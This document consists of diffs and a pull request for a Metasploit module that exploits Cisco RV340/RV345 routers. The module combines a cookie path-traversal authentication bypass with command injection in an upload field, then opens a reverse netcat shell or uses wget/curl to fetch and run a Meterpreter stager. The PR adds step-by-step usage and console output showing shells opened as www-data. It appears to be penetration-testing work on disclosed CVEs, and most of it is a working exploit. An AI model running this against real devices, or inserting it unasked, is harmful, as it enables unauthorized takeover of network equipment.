       return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
     end
 
@@ -105,11 +109,17 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_command(cmd, _opts = {})
     res = send_exploit(cmd)
 
-    if target['Type'] != :unix_cmd
+    # Successful unix_cmd shells should not produce a response. But check the response code if it does, and throw
+    # Failure::NotVulnerable if 403 Forbidden is status code
+    if target['Type'] == :unix_cmd && !res.nil? && res.code == 403
+      fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable')
+    end
+
+    if target['Type'] == :linux_dropper
       fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
       begin
         body_json = res.get_json_document
-        fail_with(Failure::NotFound, 'The target did not respond with a JSON body') unless body_json
+        fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
       rescue JSON::ParserError => e
         print_error("Failed: #{e.class} - #{e.message}")
         return nil
@@ -142,12 +152,13 @@ class MetasploitModule < Msf::Exploit::Remote
     multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')
     multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name="input"; filename="%<filename>s"', filename: filename))
 
+    # Escaping "/tmp/upload/" folder that does not contain any other permanent files
     send_request_cgi({
       'method' => 'POST',
       'uri' => '/upload',
       'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
       'headers' => {
-        'Cookie' => 'sessionid =../../../etc/passwd; sessionid=' + sessionid
+        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid
       },
       'data' => multipart_form.to_s
     }, 10)

--- a/modules/exploits/linux/http/cisco_rv340_lan.rb
+++ b/modules/exploits/linux/http/cisco_rv340_lan.rb
@@ -21,6 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
           improper input validation authentication bypass, and command injection on Cisco RV340 and
           RV345 Small Business Routers. All vulnerabilities were discovered by Bien Pham
           at Sea Security.
+
+          This module works on firmware versions 1.0.03.24 and below
         },
         'License' => MSF_LICENSE,
         'Platform' => ['Linux', 'Unix'],
@@ -72,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 0,
         'DefaultOptions' => {
           'RPORT' => 443,
-          'SSL' => true, 
+          'SSL' => true,
           'MeterpreterTryToFork' => true
         },
         'Notes' => {

--- a/modules/exploits/linux/http/cisco_rv340_lan.rb
+++ b/modules/exploits/linux/http/cisco_rv340_lan.rb
@@ -88,22 +88,35 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
+  # sessionid utilized later needs to be set to length
+  # of 16 or exploit will fail.  Tested with lengths
+  # 14-17
+  def generate_session_id
+    return Rex::Text.rand_text_alphanumeric(16)
+  end
+
   def check
-    # Ripped from jbaines-r7 cisco_rv_series_authbypass_and_rce
-    # Test to see if router is responding and possibly vulnerable
-    res = send_exploit('id')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => '/upload',
+      'headers' => {
+        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id
+      }
+    }, 10)
 
-    return CheckCode::Unknown("Didn't receive a response from the target.") if res.nil?
-
-    # Versions 1.0.03.26 and above will respond with 403 Forbidden during exploitation
-    return CheckCode::Safe('The target responded with 403 Forbidden and is not vulnerable.') if res.code == 403
-
-    # Vulnerable versions will respond with 301 Moved Permanently in body of response
-    if res.body.include?('<head><title>301 Moved Permanently</title></head>')
-      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
+    # A proper "upload" will trigger file creation.  So created above is an incorrect "upload" call to avoid file
+    # creation. The router return a status code 405 Not Allowed if authentication has been bypassed by above request.
+    # The firmware containing this authentication bypass also contains the command injection vulnerability that will be
+    # abused during actual exploitation. Non-vulnerable firmware versions will respond with 403 Forbidden.
+    if res.nil?
+      return CheckCode::Unknown('The device did not respond to request packet.')
+    elsif !res.nil? && res.code == 405
+      return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
+    elsif res.code == 403
+      return CheckCode::Safe('The device is not vulnerable to exploitation.')
+    else # Catch-all
+      return CheckCode::Unknown('The target responded in such a way that exploitation in unknown and unlikely.')
     end
-
-    CheckCode::Safe('The target did not respond with an expected payload.')
   end
 
   def execute_command(cmd, _opts = {})
@@ -116,6 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if target['Type'] == :linux_dropper
+      fail_with(Failure::Unreachable, 'The target did not respond') unless res
       fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
       begin
         body_json = res.get_json_document

--- a/modules/exploits/linux/http/cisco_rv340_lan.rb
+++ b/modules/exploits/linux/http/cisco_rv340_lan.rb
@@ -1,0 +1,162 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco RV34X Series Authentication Bypass and Command Injection',
+        'Description' => %q{
+          This module exploits a sessionid directory traversal authentication bypass, a sessionid
+          improper input validation authentication bypass, and command injection on Cisco RV340 and
+          RV345 Small Business Routers. All vulnerabilities were discovered by Bien Pham
+          at Sea Security.
+        },
+        'License' => MSF_LICENSE,
+        'Platform' => ['Linux', 'Unix'],
+        'Author' => [
+          'Biem Pham',  # Vulnerability Discoveries
+          'Neterum',    # Metasploit Module
+          'jbaines-r7'  # This metasploit module is heavily inspired from
+                        # cisco_rv_series_authbypass_and_rce.rb
+        ],
+        'DisclosureDate' => '2021-11-02',
+        'Arch' => [ARCH_CMD, ARCH_ARMLE],
+        'References' => [
+          [ 'URL', 'https://blog.security.sea.com/posts/pwn2own-2021-rv340/'], # Possibly down
+          [ 'CVE', '2022-20701'],
+          [ 'CVE', '2022-20705'],
+          [ 'CVE', '2022-20707'],
+          [ 'CVE', '2022-20705']
+        ],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'Payload' => {
+              },
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'Payload' => {
+                'BadChars' => '\''
+              },
+              'CmdStagerFlavor' => [ 'wget', 'curl' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true, 
+          'MeterpreterTryToFork' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base path', '/'])
+      ]
+    )
+  end
+
+  def check
+    # Ripped from jbaines-r7 cisco_rv_series_authbypass_and_rce
+    # Test to see if router is responding and possibly vulnerable
+    res = send_exploit('id')
+    return CheckCode::Unknown("Didn't receive a response from the target.") unless res
+    return CheckCode::Safe('The target did not respond with a 200 OK.') unless res.code == 200
+
+    if res.body.include?('"jsonrpc":"2.0"') || res.body.include?('<head><title>301 Moved Permanently</title></head>')
+      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
+    end
+
+    CheckCode::Safe('The target did not respond with an expected payload.')
+  end
+
+  def execute_command(cmd, _opts = {})
+    res = send_exploit(cmd)
+
+    if target['Type'] != :unix_cmd
+      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
+      body_json = res.get_json_document
+      fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
+    end
+
+    print_good('Exploit successfully executed.')
+  end
+
+  def send_exploit(cmd)
+    send_request_cgi( {
+                        'encode_params' => false,
+                        'method' => 'POST',
+                        'uri' => '/jsonrpc',
+                        'data' => '{"jsonrpc": "2.0", "method": "login", "params": {"user": "bienpnn", "pass": "bienpnn"}}'
+                        })
+
+    filepath = '/tmp/upload.input'
+    filename = 'bienpnn'
+    pathparam = 'Configuration'
+    fileparam = 'bienpnn'
+
+    destination = '\'; ' + cmd + " #"
+    input = 'bienpnn'
+
+    multipart_form = Rex::MIME::Message.new
+    multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')
+    multipart_form.add_part(filename, nil, nil, 'form-data; name="filename"')
+    multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"')
+    multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"')
+    multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')
+    multipart_form.add_part(input, 'application/octet-stream', nil, 'form-data; name="input"; filename="bienpnn"')
+
+    send_request_cgi({
+                       'method' => 'POST',
+                       'uri' => '/upload',
+                       'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
+                       'headers' => {
+                         'Cookie' => 'sessionid =../../../etc/passwd; sessionid=aaaaaaaaaaaaaaaa'
+                       },
+                       'data' => multipart_form.to_s
+                     }, 10)
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager(linemax: 120)
+    end
+  end
+end


### PR DESCRIPTION
Module exploits multiple authentication bypasses and a command injection to achieve code execution on Cisco RV340x Small Business Routers under the www-data user.  Vulnerable up to, and tested against, firmware version 1.0.03.24. Version 1.0.03.26 removes these vulnerabilities.  

Utilizes vulnerabilities from CVE-2022-20705 and CVE-2022-20707 for RCE.  

Credit to Biem Pham at Sea Security for weaponizing the exploits.  

Credit to jbaines-r7 as most code in this module was adapted from cisco_rv_series_authbypass_and_rce.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use modules/exploits/linux/http/cisco_rv340_lan`
- [ ] `set lhost <listening ip>`
- [ ] `set rhost <target ip>`
- [ ] `exploit`
- [ ] Exploit will print out `Exploit successfully executed` and verify with "id" command
- [ ] Non-vulnerable versions (1.0.03.26 and above) will not create a session

## Reverse Netcat Output
```
msf6 > use modules/exploits/linux/http/cisco_rv340_lan
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(linux/http/cisco_rv340_lan) > set lhost 192.168.1.142
lhost => 192.168.1.142
msf6 exploit(linux/http/cisco_rv340_lan) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf6 exploit(linux/http/cisco_rv340_lan) > exploit

[*] Started reverse TCP handler on 192.168.1.142:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The device responded to exploitation with a 200 OK.
[*] Executing Unix Command for cmd/unix/reverse_netcat
[*] Command shell session 1 opened (192.168.1.142:4444 -> 192.168.1.1:55885) at 2023-02-05 10:06:22 -0500
[+] Exploit successfully executed.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```
## Linux Dropper

```
msf6 > use modules/exploits/linux/http/cisco_rv340_lan
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(linux/http/cisco_rv340_lan) > set lhost 192.168.1.142
lhost => 192.168.1.142
msf6 exploit(linux/http/cisco_rv340_lan) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf6 exploit(linux/http/cisco_rv340_lan) > set target 1
target => 1
msf6 exploit(linux/http/cisco_rv340_lan) > exploit

[*] Started reverse TCP handler on 192.168.1.142:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The device responded to exploitation with a 200 OK.
[*] Executing Linux Dropper for linux/armle/meterpreter/reverse_tcp
[*] Using URL: http://192.168.1.142:8080/3b2NfBKR0OS
[*] Client 192.168.1.1 (Wget) requested /3b2NfBKR0OS
[*] Sending payload to 192.168.1.1 (Wget)
[*] Sending stage (934728 bytes) to 192.168.1.1
[+] Exploit successfully executed.
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Meterpreter session 2 opened (192.168.1.142:4444 -> 192.168.1.1:55950) at 2023-02-05 10:12:37 -0500
[*] Server stopped.

meterpreter > shell
Process 11012 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```

PCAPs will be emailed to [msfdev@metasploit.com](mailto:msfdev@metasploit.com)